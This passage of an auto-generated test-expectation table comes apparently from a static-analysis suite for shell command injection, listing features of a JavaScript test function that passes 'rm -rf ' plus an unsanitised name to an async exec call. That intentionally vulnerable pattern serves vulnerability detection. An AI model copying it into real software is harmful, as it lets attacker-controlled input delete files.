mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:16:441:25 | asyncStuff | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:16:441:25 | asyncStuff | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:16:441:25 | asyncStuff | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | asyncExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | asyncExec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | asyncExec | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | asyncExec | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | asyncExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | this | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | this | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:441:28 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | 'arguments' object of anonymous function | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | exceptional return of anonymous function | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | exceptional return of anonymous function | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | functio ... OT OK\\n} | assignedToPropName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | functio ... OT OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | functio ... OT OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | return of anonymous function | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | return of anonymous function | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:29:443:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:441:39:441:42 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:10 | asyncExec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:10 | asyncExec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:10 | asyncExec | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:10 | asyncExec | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:10 | asyncExec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | asyncEx ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | asyncEx ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | asyncEx ... + name) | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | asyncEx ... + name) | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | asyncEx ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | exceptional return of asyncEx ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | exceptional return of asyncEx ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | exceptional return of asyncEx ... + name) | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | exceptional return of asyncEx ... + name) | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:2:442:28 | exceptional return of asyncEx ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:20 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:20 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:20 | "rm -rf " | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:20 | "rm -rf " | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:20 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:20 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:27 | "rm -rf " + name | CalleeFlexibleAccessPath | asyncExec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:27 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:27 | "rm -rf " + name | calleeImports | async-execute | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:27 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:27 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:27 | "rm -rf " + name | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:27 | "rm -rf " + name | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:12:442:27 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:24:442:27 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:24:442:27 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:24:442:27 | name | enclosingFunctionBody | name asyncExec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:24:442:27 | name | enclosingFunctionName | asyncStuff | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:24:442:27 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:442:24:442:27 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| 